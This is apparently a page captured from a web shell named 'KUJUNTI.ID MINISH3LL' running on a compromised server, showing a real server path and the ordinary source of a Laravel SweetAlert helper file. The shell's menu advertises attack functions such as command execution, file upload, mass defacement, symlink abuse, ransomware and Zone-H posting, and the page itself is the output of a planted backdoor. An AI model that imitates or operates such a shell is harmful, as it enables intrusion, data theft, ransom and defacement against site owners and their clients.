KUJUNTI.ID MINISH3LL
Path : /var/www/clients/client0/web25/web/vendor/realrashid/sweet-alert/src/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/clients/client0/web25/web/vendor/realrashid/sweet-alert/src/functions.php


<?php

if (!function_exists('alert')) {

    /**
     * Return app instance of Alert.
     *
     * @param string $title
     * @param string $message
     * @param string $type
     * @author Rashid Ali <realrashid05@gmail.com>
     */
    function alert($title = '', $message = '', $type = '')
    {
        $alert = app('alert');
        if (!is_null($title)) {
            return $alert->alert($title, $message, $type);
        }
        return $alert;
    }
}

if (!function_exists('toast')) {

    /**
     * Return app instance of Toast.
     *
     * @param string $title
     * @param string $type
     * @param string $position
     * @author Rashid Ali <realrashid05@gmail.com>
     */
    function toast($title = '', $type = null, $position = 'bottom-right')
    {
        $alert = app('alert');
        if (!is_null($title)) {
            return $alert->toast($title, $type, $position);
        }
        return $alert;
    }
}

© KUJUNTI.ID

Website Feedback Form

Please fill out the form below to send us your feedback.




Contact Support